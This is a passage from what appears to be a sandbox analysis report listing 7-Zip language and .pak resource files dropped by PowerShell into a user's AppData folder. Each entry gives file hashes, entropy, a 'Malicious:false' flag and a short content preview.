                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.53 : Berend Ytsma..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Frisian..Frysk..401..Okee..Ofbrekke........&Jawis..&Nee..&Slute..Help....&Ferfetsje..440..Jawis foar &Alles..Nee foar A&lles..Stopje..Opnij begjinne..&Eftergr.n..&Foargr.n..&Skoftsje..Skoft..Binne jo wis dat jo .fbrekke wolle?..500..&Triem..&Bewurkje..&Byld..B&l.dwizers..&Ark..&Help..540..&Iepenje..Iepenje &yn..Iepenje b.&ten..&Byld..&Bewurkje..Omne&ame..&Kopiearje nei.....&Ferpleats nei.....&Wiskje..Triemmen &spjalte.....Triemmen Kom&binearje.....E&igenskippen..Komme&ntaar..Kontr.lesom berekenje....Map meitsje..Triem meitsje..U&tgong..600..&Alles selektearje..Alles net selektearje..&Seleksje omdraaien..Selektearje.....Net selektearje.....Selektearje neffens type..Net selektearje neffens type..700..Gru&tte Ikoanen..L&ytse Ikoanen..&List..&Details..730..Net Sortearre..Platte werjefte..&2 Panielen..&Arkbalke..Haadmap iepenje..Ien nivo omheech..Maphistoarje.....&Ferfarskje..750..Argyf arkbalke..Stan

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\ga.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8394
                                                                                                                                                          Entropy (8bit):4.904288029664947
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iOCmUaOzBKdHRZqt83HRE0HruLP2HJioV/TFa18QCbjXsf0VUY+sGa:iTRNtKMt8BM1Y+ba
                                                                                                                                                          MD5:B4295E254B9DFC90E0093188257C007C
                                                                                                                                                          SHA1:6AE9B959A752C32FAB8407B3AA277F300165A579
                                                                                                                                                          SHA-256:406669ECBDF562E773B9CDF831CF5F63C3DD1A012C3521A41227C9141511D959
                                                                                                                                                          SHA-512:CC4671A9312B7F41DDECD2E02D038AFFD58BBC62363B811F15F10002C82AE826E060F5AD6E2B1FD75557B3DC3BBF12B6E6900B398623CF547E3727CCAA6BF8E1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.07 : Sean.n . Coist.n..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Irish..Gaeilge..401..T. go maith..Cealaigh........&T...&N.l..&D.n..Cabhair....&Lean ar aghaidh..440..T. do gach ceann..N.l go gach ceann..Stad..Atosaigh..&C.lra..&Tulra..&Cuir ar sos..Ar sos..An bhfuil t. cinnte gur mian leat . a cheal.?..500..&Comhad..&Leagan..Am&harc..Cean.in..&Uirlis...&Cabhair..540..&Oscail..Oscail &istigh..Oscail &lasamuigh..&Amharc..&Eagar..Athainmnigh..&Macasamhlaigh go.....&Bog go.....S&crios..Scar an comhad.....Cumascaigh na comhaid.....Air.onna..N.ta tr.chta..R.omh an tsuim sheice.la..Diff..Cruthaigh fillte.n..Cruthaigh comhad..&Scoir..600..Roghnaigh &uile..D.roghnaigh uile..&Aisiompaigh an roghn.ch.n..Roghnaigh.....D.roghnaigh.....Roghnaigh de r.ir cine.l..D.roghnaigh de r.ir cine.l..700..&Deilbh.n. m.ra..&Deilbh.n. beaga..&Liosta..&Sonra...730..Neamhaicmithe..Gach rud in aon chiseal..&2 fhuinneog..&Barra. na n-uirlis...Oscail an fr.

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\gl.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9246
                                                                                                                                                          Entropy (8bit):4.956252479946546
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iObNz5MsaqwKlr7UdusuTcaHAB9yVU8SqSd6W5rnuc+Yvy36rV:iOV5jaqwKlr7Ud+LgB9yVdOnuca6rV
                                                                                                                                                          MD5:492E51B4B5B287FE2B90A5F0BD433847
                                                                                                                                                          SHA1:F7E1EBA770D3D07D0E8C2BD61D556508EF0578B8
                                                                                                                                                          SHA-256:54F676333CE58AF67B839B0F0470F99F405B5CE7FDB9C345A19D00B6423277E5
                                                                                                                                                          SHA-512:0AA1DF55256324B24B495543E4ABBEFD776108BDD90D3155D02B1C10F018BDBD1700C4430848DFBD5073A374715F8510EFB17AE1812A9AA44B65E50EDB23DE59
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 15.00 : 2016-02-01 : enfeitizador..;..; 9.20 : 2014-11-26 : enfeitizador..;..; 3.12 : 2007-11-22 : Xos. Calvo..;..;..;..;..;..;..0..7-Zip..Galician..Galego..401..De acordo..Cancelar........&Si..&Non..Pe&char..Axuda....&Continuar..440..Si &a todo..Non a &todo..Parar..Reiniciar..Po.er por de&baixo..Traer ao &fronte..&Pausa..Pausado..Ten a certeza de querer cancelar?..500..&Ficheiro..&Editar..&Ver..F&avoritos..Ferramen&tas..A&xuda..540..&Abrir..Abrir &dentro..Abrir &fora..&Ver..&Editar..Rena&me..&Copiar a.....&Mover a.....&Eliminar..&Dividir ficheiro.....Com&binar ficheiros.....P&ropiedades..Come&ntario.....Calcular suma de verificaci.n..Diferenzas..Crear cartafol..Crear ficheiro..Sa&.r..Ligaz.n..&Alternar fluxos..600..Seleccion&ar todo..Desmarcar todo..&Inverter selecci.n..Seleccionar.....Desmarcar.....Seleccionar por tipo..Desmarcar por tipo..700..Iconas lon&gas..Iconas &mi.das..&Lista..&Detalles..730..Sen orde..Vista plana..&2 paneis..Barras de ferramen&

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\gu.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18258
                                                                                                                                                          Entropy (8bit):3.927118615474052
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:iyxKBXaWdxmWpk2x8QL/XwxD92K+R5+Twk292Bh72/OXMQH12fdvKA52hJV22b2o:FKBz5Cw+wvKAQco
                                                                                                                                                          MD5:410C8A33C66B4B2BC707E113D9C76914
                                                                                                                                                          SHA1:81A9F3618168DBECF309907EE74591AC3B1297B6
                                                                                                                                                          SHA-256:9025D8A58E0C76B186C943EF8A73A1BBA6C08945E346DE14D3C255CCFA3A10E6
                                                                                                                                                          SHA-512:A520CF2DC7E9F653BB08C93C657CB8E2D1142E86C3E0BACC44457CBA5EDE044E91FF01F55139C5AEB7B3F26E51724931EA2B2BB20A058C4B9D888A3AE8766021
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.07 : Vinayy Sharrma : .... ..... ...... ........ ..... ..... .. .. ....... ... ....... .... ..... .... ..... .. .... ..., .. ..... ! .. ...... ! .. .... ...... ! .. .........;..;..;..;..;..;..;..;..;..;..0..7-Zip..Gujarati, Indian, ......................401.....................&.....&....&... ............&.... ......440..&... .... .....&... .... .............. .... .....&............&........(.........)..&...................... .... .... .... ... ...

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\he.pak

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):127834
                                                                                                                                                          Entropy (8bit):4.853527099518656
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:MSeD15QWmU6XrlH/piG5Bnm3XTnZ2F2j9V:MSeD15KPXrlH/piG5BnOXTnZ2F2j9V
                                                                                                                                                          MD5:209974550CC2A835F1879995851B424A
                                                                                                                                                          SHA1:F09850B9E7FFFCE197E362B9562CD0FF1C5C71ED
                                                                                                                                                          SHA-256:CA440D0128B62E35333730C5925992AE5B4B05A37C10105A9145EB5CF7A77071
                                                                                                                                                          SHA-512:4AB857ADEAB0E45F03868D1208D8F3250BBE27C5854BBC885E94E7E6ED8BCF9BDB2FF5035BEBB1958B345ECADF244DCC433D760643EA544066B32F3F1E266276
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:............j..2..k..2..l..2..n..2..o..2..p..2..q..2..r..2..s..2..t..3..v..3..w.%3..y.+3..z.:3..|.@3..}.R3....Z3...._3....g3....o3....w3....~3.....3.....3.....3.....3.....3.....3.....4....'4....D4....F4....J4....a4....z4.....4.....4.....4.....4.....4.....4.....4.....4.....4.....5.....5....#5.....5....B5....J5....T5....{5..*..5..+..5..,..5../..5..0..5..1..6..2..6..3.76..4.[6..5..6..6..6..7..6..>..6..?..7..N.&7..g.37..i.67..j.:7..k.?7..l.G7..xFL7..yFT7..zFx7..{F.7...F.7...F.7...F.7...F.8...F.8...F18...FH8...F.8...F.8...F.8...F.9...F.9...F:9...Fv9...F.:...F.:...F<;...FT;...F.;...F.;...F.;...Fm<...F\=...Fy=...F.=...F.=...F.>...Fs?...F.?...F.?...F.?...FaB...F.C...F.D...F.E...FBE...FLE...FcE...FpE...F.E...F.E...F.F...FNF...F.F...F.G...F.G...FgG...F.G...F2H...F.H...F.H...F.H...F.I...F.I...F.I...F.I...FBI...F`I...FzI...F{I...F.I...F.I...F.I...F.J...F.J...F.J...F.J...F.J...F.K...F.K...F&K...FaK...F.L...F.O...F.O...F.O...F)P...F3P...FLP...FbP...FwP...F.Q...FUQ...F.Q...F.Q...F&R...FYR...FiR...FmR

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\he.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11405
                                                                                                                                                          Entropy (8bit):4.0009346955133775
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i3D58xnxi9MoO0EGp/SDB52RM/VtvQPyE7H/Y8vFzicYWrWxusvU3FXxaXbhNXf2:i3V8YdE0cP2RCVFQPyE7YcYGW9U3F490
                                                                                                                                                          MD5:1B53819F8D58FD734B5FD985756B557C
                                                                                                                                                          SHA1:8759783ADBD62C6F32511313BABB9D138FA0A150
                                                                                                                                                          SHA-256:DCD061A0A7B29F55FA28D4396F60881836C2DF07CD936412C476A7F149540CC4
                                                                                                                                                          SHA-512:B7F0A16D9D02434E7D1C619768DC1D67C163AD6630C19630C405B5934311C41B65918C61DD5F27555CF5CF629411D57FE2CE04FC6C99A2272D4689B69A078E73
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : peterg..; : Gal Brill..; 9.13 : 2010-04-30 : Jonathan Lahav..; 19.00 : 2020-05-01 : ION..;..;..;..;..;..;..;..0..7-Zip..Hebrew.........401..................&....&....&..............&......440.... .&...... &............... ......&.....&.......&.............?.. ... .... .... .... ......500..&......&.......&.......&.........&.......&.....540...&....... .&......... .&.....&.....&......&... ........&. .......&.. ....&........&. .......&... .......&.............&....... ..... ................... ........... ......&............&..... .........600..... &........ ..... .....&.... ................. .......... ... ........ .....

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\hi.pak

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):211379
                                                                                                                                                          Entropy (8bit):4.444505410677775
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:XkOxgTgcwfKSj33cdEVhk7ovrCEO/S/bBfvTHef+a7BKfzzrRE3b8RLljlxCYPhb:rOCi8R
                                                                                                                                                          MD5:FA034EB13D21CE4E9FC2D3EAFDF40CD2
                                                                                                                                                          SHA1:0992D91706D26B6CC2FF64D899308BA4E9380A35
                                                                                                                                                          SHA-256:1CA6A0546F9627FA9BA3D377D79A21FF26EC9B349D47247C9B241A70728D0699
                                                                                                                                                          SHA-512:4F8024F43A70D9D8AE67848E2540B028CF1B9183B7DEDD66043FB16394601DA986D695C8D28F072444A69C1B2639C8B79096065389069FB854D152DB166ED734
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:............j..2..k..2..l..2..n..2..o..2..p..2..q..2..r..2..s..2..t..2..v..3..w.!3..y.'3..z.63..|.<3..}.N3....V3....[3....c3....k3....s3....z3.....3.....3.....3.....3.....4....>4....c4.....4.....4.....4.....4.....4.....4....#5....E5....g5.....5.....5.....5.....5.....5.....5.....6.....6..../6....[6....|6.....6.....6.....6..*..6..+..6..,..7../.S7..0.j7..1..7..2..8..3.)8..4.h8..5..8..6..8..7.?9..>..9..?..9..N..9..g..9..i..9..j..:..k..:..l..:..xF.:..yF2:..zFw:..{F.:...FN;...Fr;...F~;...F.;...F.;...F.;...F.;...F.<...F.=...F2=...Fg=...Fw=...F.=...F;>...F2?...F.@...F.A...F?A...F~A...F.A...F.A...F"C...F.D...F.D...F(E...F.E...F.F...F.H...FDH...FuH...F.H...F.K...F&M...FaN...F.N...F&O...F<O...F[O...FmO...F.O...F.P...F_Q...F.Q...F.R...F.R...F.S...FRS...F(T...F.T...F.U...FdV...F.V...F.V...F.V...F.V...F;W...F.W...F.W...F.W...F.X...F.X...F.X...F2Y...F.Y...F.Z...FAZ...F.Z...F.Z...F.Z...F.[...F.\...F.b...FHc...F.c...F.c...F.d...F8d...F^d...F.d...F.e...FHf...F.f...F?g...F.g...F.g...F.g...F.g...F.g...F.h

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\hi.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18290
                                                                                                                                                          Entropy (8bit):3.9142884355450493
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:icNErTw7YtUD/xvVxkTTkjxQ10Up/ijaCXEk02VQGKFO8YeY:n601ao2hY
                                                                                                                                                          MD5:A0FC3C3D880A54918D86B40FFDA12F23
                                                                                                                                                          SHA1:34FB9F1B5A6731100466F66E193AB5028B3EC1BE
                                                                                                                                                          SHA-256:8CCE5E5A846196DAC3649483290160177F47D88A7DCF0E85ACFD3131856A266A
                                                                                                                                                          SHA-512:BD1F17D76699F177CE6DF4B69F82DFA777A0AE20E243D5FED0605FE951A79D8AE54371B07EB30F075161C108F46BE1CE21B162B66CC099C02ADB6EB6D5E8F158
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.07 : Vinayy Sharrma : ...... .... ..... ..... .. .. .. .... ... ..... .. ... ..... .. .. .... ...... .. .... ..., .. ..... ! .. ...... !..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Hindi, Indian, .....................401..... ................&.....&......&... ............&.... .....440..&... .. .... .....&... .. .... ................ .... ......&............&........(.........)..&....................... .... .... ..... ... ....... .... .. ....?..500..&......&

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\hr.pak

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):101535
                                                                                                                                                          Entropy (8bit):5.522777250626834
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:1JKdAGC/lemhlBExypakZUaO2sMMoLaz7v53Kkx9i:lHiKp
                                                                                                                                                          MD5:624BCE9B02382312F4588D3147B738A3
                                                                                                                                                          SHA1:8DF16C75C9E86A96D9F2B11E80EB182BA6C8EEF9
                                                                                                                                                          SHA-256:64E531E46CF5B644D1B7F1DF885EFCF51A65DB50FAB65AB250F5E4E1ADFA9D29
                                                                                                                                                          SHA-512:E74E56210CB3C184499DE4E0D9E57E8EE9D7314B93FB1A97030A3397CC47B91EC74C704B25FC4BD16F4C7680240AE1D39D69CD9F024DD52C90EAE9CC6C53B6AE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:............j..2..k..2..l..2..n..2..o..2..p..3..q..3..r..3..s.&3..t./3..v.D3..w.Q3..y.W3..z.f3..|.l3..}.~3.....3.....3.....3.....3.....3.....3.....3.....3.....3.....3.....3.....3.....3.....4.....4.....4.... 4....(4....44....B4....S4....f4....|4.....4.....4.....4.....4.....4.....4.....4.....4.....4.....4.....4.....4.....5..*..5..+..5..,.05../.I5..0.O5..1..5..2..5..3..5..4..5..5..5..6.!6..7.:6..>.T6..?.]6..N.n6..g.w6..i.z6..j.~6..k..6..l..6..xF.6..yF.6..zF.6..{F.6...F.6...F.7...F.7...F.7...F.7...F:7...FK7...F.7...F.7...F.7...F.7...F.7...F.8...F58...F.8...F.9...Ff9...Fz9...F.9...F.9...F.9...F?:...F.:...F.;...F.;...F\;...F.;...F.<...F.<...F.<...F.<...F.>...F.?...F.@...F.@...F.@...F.@...F.A...F.A...F)A...FKA...F.A...F.A...F.B...F0B...FGB...FoB...F.B...F.C...FtC...F.C...F.C...F.C...F.C...F.C...F.C...F.D...F.D...F.D...F)D...F,D...F]D...F.D...F.D...F.D...F.D...F.E...F'E...F,E...F9E...F_E...F.E...F.H...F.H...F.H...F.I...F.I...F'I...F>I...FMI...F.I...F.I...FEJ...FpJ...F.J...F.J...F.J...F.J...F.J

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\hr.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8620
                                                                                                                                                          Entropy (8bit):5.041227149386308
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iw/kl7v3mUecLy8RIxXr1aYPDIbOPw7zinGjeQOsEyKtizzDQ:ixpvNeBUuXr03inG2tyKtiPDQ
                                                                                                                                                          MD5:A0A8A75560EFCF15801C96E6D71BECC3
                                                                                                                                                          SHA1:B3F7B92D2A13151A14B493108A50A8365C46F6A0
                                                                                                                                                          SHA-256:A72F01215EBA3BE3AF6659129DD20F7A42D74F1DA08658A9C8CE8E303C3E8F64
                                                                                                                                                          SHA-512:D730C0DC30A299B6BAB1B8CFAE64D8D4BDEA121E651641F578B0947BF5F67669F342CE20198B26FE7881EC99BAF290695BC460828198A997B4E59EC91396C217
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 3.12 : Alan .imek..; 4.53 : Hasan Osmanagi...; 9.07 : ..; 15.05 : 2015-06-15 : Stjepan Treger ..;..;..;..;..;..;..;..0..7-Zip..Croatian..Hrvatski..401..U redu..Odustani........&Da..&Ne..&Zatvori..Pomo.....Nastavi..440..Da za &Sve..Ne za Sv&e..&Stani..Ponovi..U pozadini..U prvom planu..&Pauza..Pauzirano..Poni.titi?..500..&Datoteke..&Ure.ivanje..&Izgled..Omiljene mape..&Alati..&Pomo...540..&Otvori..Ot&vori mapu..Otvori u &sustavu..Iz&gled..&Ure.ivanje..Prei&menuj..&Kopiraj u.....Premje&sti u.....O&bri.i..Podije&li datoteku.....Spo&ji datoteke.....Svojs&tva..Komentar..Izra.un kontrolnog zbroja..Uspore.ivanje..Stvo&ri mapu..Stvori &datoteku..&Izlaz..Poveznica..&Alternativni tokovi..600..Odaberi &sve..Poni.ti odabir..&Obrni odabir..Odaberi.....Poni.ti odabir.....Odabir po tipu..Poni.ti odabir tipa..700..&Velike ikone..&Male ikone..&Popis..&Detalji..730..Neso&rtirano..Sadr.aj mapa..&2 okna..Alatne &trake..&Korijen..&Nadmapa..Pro.&le mape.....O&svje.

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\hu.pak

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):108879
                                                                                                                                                          Entropy (8bit):5.649075357935098
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:a1WzOkbJiCwF/iGn1dgTrdA0RdpEtL1543ICJ:eSbY/iGkTtRdpEPu3ICJ
                                                                                                                                                          MD5:CA8A821FF5A6B848C5A170FF9A97BB39
                                                                                                                                                          SHA1:A98B91FA29848013CEF021EC8B3A29979CAC0C65
                                                                                                                                                          SHA-256:FDD99D667419612BF98200783E0CCF0F7C11913CA03CA162D72D43F6861E5478
                                                                                                                                                          SHA-512:E475A09E1F9F740B6C36C9B33B20F263896B869D8AC58848504DB29903A9597B84761B9C3918ADDC9C726D4429A0F496F44E3A8B0CCE9A3008D071A5D46BB5C6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:............j..2..k..2..l..2..n..2..o..2..p..2..q..2..r..3..s..3..t..3..v.23..w.?3..y.E3..z.T3..|.Z3..}.l3....t3....y3.....3.....3.....3.....3.....3.....3.....3.....3.....3.....3.....4...."4....64....84....<4....H4....O4....d4....y4.....4.....4.....4.....4.....4.....4.....4.....4.....5.....5.....5....45....:5....@5....b5..*.k5..+.n5..,..5../..5..0..5..1..5..2..5..3..5..4..6..5.66..6.n6..7..6..>..6..?..6..N..6..g..6..i..6..j..6..k..6..l..6..xF.6..yF.6..zF.7..{F#7...Fd7...Ft7...F{7...F.7...F.7...F.7...F.7...F.7...F.8...F-8...F@8...FE8...Fb8...F.8...F.8...Ff9...F.9...F.9...F":...F6:...FS:...F.:...F.;...F.;...F.;...F.<...F.<...F.=...F.=...F)=...FF=...F_>...F.>...FN?...F.?...F.?...F.?...F.?...F.?...F.@...F3@...F.@...F.@...F.A...FAA...FVA...F.A...F.B...FbB...F.B...F.B...F-C...F;C...FGC...FMC...FPC...FhC...F.C...F.C...F.C...F.C...F.C...F.C...F D...FlD...F.D...F.D...F.D...F.D...F.D...F.D...F.E...F{E...F.G...F4G...F\G...F.G...F.G...F.G...F.G...F.G...F7H...F.H...F.H...F.I...FBI...FhI...FxI...F.I

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\hu.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9601
                                                                                                                                                          Entropy (8bit):5.256309162337387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iZEtt30B1cWELI7BD5QoMJu2dGiYU8dGfVFr6ksQA3+oV6YVSUJRPn:iaHOvxlQhJu2dLVUGfVFr6ksp3+oV63q
                                                                                                                                                          MD5:EEBEA9C4E71A5D2820F5E8972822800F
                                                                                                                                                          SHA1:E9F5E741995BF92266E5B6D6891896E5B9CC1F42
                                                                                                                                                          SHA-256:EF79E98FC911E0D0D16BD061A65F50F5E50CAA011699852E1608A2629B8BA37D
                                                                                                                                                          SHA-512:01B4BD586A1B2629B94DAB877510110E6FA1286EB9CDF7882539D42466609D830489BA450E7E7CC41958F463227F5376151F912591AA88C7866182374ED574A5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Jozsef Tamas Herczeg..; 9.16 : Nyilas MISY..; 15.00 : 2021-11-09 : Barnabas Kovacs..;..;..;..;..;..;..;..;..0..7-Zip..Hungarian..Magyar..401..OK..M.gsem........&Igen..&Nem..&Bez.r.s..S.g.....&Folytat.s..440..I&gen, mindre..N&em, mindre..Le.ll.t.s...jraind.t.s..&H.tt.rben..&El.t.rben..&Sz.net..Sz.net..Biztos, hogy megszak.tja a folyamatot?..500..&F.jl..S&zerkeszt.s..&N.zet..Ked&vencek..&Eszk.z.k..&S.g...540..M&egnyit.s..Megnyit.s &bel.l..Megnyit.s k.&v.l..&N.zet..S&zerkeszt.s...tn&evez.s..M.s&ol.s mapp.ba......t&helyez.s mapp.ba.....&T.rl.s..F.jl&darabol.s.....F.jl&egyes.t.s.....T&ulajdons.gok..&Megjegyz.s..Checksum sz.mol.sa..K.l.nbs.g..Mappa l.trehoz.sa..F.jl l.trehoz.sa..&Kil.p.s..Link..Alternat.v adatfolyam..600..Min&d kijel.l.se..Kijel.l.s megsz.ntet.se..Kijel.l.s &megford.t.sa..Kijel.l.s.....Megsz.ntet.s.....Kijel.l.s t.pus alapj.n..Megsz.ntet.s t.pus alapj.n..700.

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\hy.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):14158
                                                                                                                                                          Entropy (8bit):4.347497505676546
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:igxIecm/mNxhlsms7CBFPwWbLkSMBvAoPz3qkZXDwC7o9F9f:iTeB4lE7Gw8KoqznlT2F9f
                                                                                                                                                          MD5:1362C3C286CFF992117D5466BBE284F6
                                                                                                                                                          SHA1:FAF50ECDB6DB6CD6BA9E0AE18E7FAD64511048C7
                                                                                                                                                          SHA-256:D8F60BF92541D20D01F6DDD56D49F25519303FD16E285E18080BE6815B74B8A8
                                                                                                                                                          SHA-512:1834FE901B1182B793872E2A822801966ABDF312873E15877E589B9C6A58D04E06A2C60B26D2209FE7048F7EA9BEFE0F6B39630EB4C5578A54735B6840677205
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Gevorg Papikyan..; 15.00 : Hrant Ohanyan : http://haysoft.org..;..;..;..;..;..;..;..;..;..0..7-Zip..Armenian...........401.......................&.....&....&.....................&............440..... ...... &......... ...... &.............................&...............&.........&............. ... ..............500..&......&..........&......&.............&..........&............540..&............ &.............. ...&.............&.............&.........&.............&..............&.............& ...........&....... ................&.................&.....................................&....... ..............

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\id.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8344
                                                                                                                                                          Entropy (8bit):4.872988134413637
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iQLoEmEjXCv1MYlMRsF40N+7EeN2ev9KJ3nhuCoLqY:i0oEmEjCv7lmsF67yev9KJ3nJouY
                                                                                                                                                          MD5:73B9F189F0C37D7CF37DF8DB89FB52AF
                                                                                                                                                          SHA1:060AD5B22F8DD408260B7210392C0A6F6271FBFF
                                                                                                                                                          SHA-256:18C4531E9FC00ED242F1C0526DBCD0A3D1ADA9BCFEE651AE950328AC872A216F
                                                                                                                                                          SHA-512:F8DCA8E9AECBAA7FD596535FB792314253814098C1089262ED36E78960FFEBE377C6436354228A9B4E17BB87FA6E1833110FD843C63BBCE3294262B623DF86E0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 20.00 : 2020-02-18 : Frans Leung..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Indonesian..Bahasa Indonesia..401..Oke..Batal........&Ya..&Tidak..&Tutup..Bantuan....&Lanjut..440..Ya untuk &semua..Tidak untuk s&emua..Henti..Mulai Ulang..Latar Bela&kang..Latar &Depan..&Jeda..Dijeda..Anda yakin ingin batal?..500..&Berkas..&Edit..Tam&pilan..&Kesukaan..Pera&latan..Ban&tuan..540..&Buka..Buka di &Dalam..Buka di L&uar..&Tampilkan..&Edit..&Nama Ulang..&Salin Ke.....P&indah Ke.....&Hapus..Be&lah Berkas.....Gabun&g Berkas.....P&roperti..K&omentar.....Hitung ceksum..Beda..Buat Direktori..Buat Berkas..&Keluar..Tautan..Alternati&f Aliran..600..Pi&lih Semua..Batal Pilih Semua..Pilih Sebal&iknya..Pilih.....Batal Pilih.....Pilih Berdasarkan Tipe..Batal Pilih Berdasarkan Tipe..700..Ikon &Besar..Ikon &Kecil..&Daftar..D&etail..730..Tidak Disortir..Tampil Datar..&2 Panel..Bilah Ala&t..Buka Akar Direktori..Naik Satu Tingkat..Riwayat Direktori.....&Segarkan..Segarkan Otomatis..750..Bilah Ala

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\is.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
